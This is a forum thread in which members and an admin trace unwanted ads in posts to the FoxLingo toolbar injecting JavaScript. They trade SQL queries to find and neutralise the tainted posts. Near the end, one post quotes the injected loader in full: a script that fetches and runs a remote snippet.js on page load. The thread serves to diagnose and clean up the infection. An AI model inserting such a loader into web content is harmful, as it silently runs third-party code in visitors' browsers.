Ok, let's wait for sb to chime in on this issue. :)
Hmm, thanks for the letting me know. I’ll check into this.
Foxlingo ad showing on my phone (opera mobile) too on both pages.
suggest you run a (Select * FROM [PostContentTable] WHERE [POST_TEXT] LIKE ‘javascript’)
obviously, replacing [PostContentTable] with the table name that holds the actual posts and [POST_TEXT] with the column that holds the text of the posts
PPtk
running linux using chrome, i got it on the links pptk posted also
It’s not just HKJ. Also shows up in Viffer750’s post from this link
Looking for a connection…
If you click this:
http://budgetlightforum.com/comment/reply/13371/232507?quote=1#comment-form
and disable rich-text, you can see it.
I strongly suspect that those ads were injected into the users’ posts without their knowledge by the Foxlingo toolbar. I’ll check into it some more.
You're right, my guess is it is a "virus" of some sort that is doing it since it is more than one person.
Edit: Sb beat me to it. ;) I'll throw out this link, where people were having trouble with foxlingo crashing things etc.
I was just about to say the same thing. Looks like it’s not their ‘fault’. They’re just lax in system security, and are being taken advantage of by the FoxLingo toolbar…
PPtk
Ref: #.appears after URL. And unknown script inserted | WordPress.org
FoxLingo automatically injecting JavaScript code into edited HTML (JavaScript is launching the Ad, Posts on this forum are HTML)
Just gonna put it out there that I hate browser toolbars or any other “force it down your throat” crap that comes with the program you’re trying to install.
I DON’T WANT IT!
Likely you guys are right on this one.
Thanks very mich PPtk. For a website admin I am shockingly ignorant about SQL queries.
Could you please help me with a query in the comments table to replace all occurences of example.com with example.com? I want to disable all of those ads by editing the link to their adserver, but I still want to leave the evidence for later investigation.
UPDATE [COMMENTS_TABLE] SET [COMMENT_TEXT]=REPLACE([COMMENT_TEXT], 'example.com', 'example.com') WHERE [COMMENT_TEXT] LIKE '%example.com%'
Again, replace [COMMENTS_TABLE] with the table name and [COMMENT_TEXT] with the column name where the actual post text is located.
PPtk
Don’t Do It! Its not showing up correctly! Don’t Do what I Just said… Standby.
No worries, I didn’t run anything yet. What isn’t showing up correctly?
There is “stuff” after the word REPLACE that isn’t showing up…
Click This
http://budgetlightforum.com/comment/reply/16860/293043?quote=1#comment-form
And you’ll see it in the quote… Just grab it from there and run it.
Ah, I see. Nice catch. You can enclose code segments in @ marks like this so the filter system doesn’t modify it.
But your @ marks didn't show up there. ;)
Gotcha. I’m not use to Drupal. I tried enclosing it in [CODE] and [/CODE] tags, which didn’t work…
I updated the original post so that it’s correct for historical reference.
This board could use a [code][/code] feature.. and an "ignorance" mode for that javascript stuff. :P
@<script id="FoxLingoJs" type="text/javascript">// <![CDATA[
!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//example.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
// ]]></script>@
But @@ works.. kinda. Didnt quite work on the admins post scaru quoted.
To prevent this in the future, adding the word “javascript” to the “Bad Words” list in Drupal should do the trick.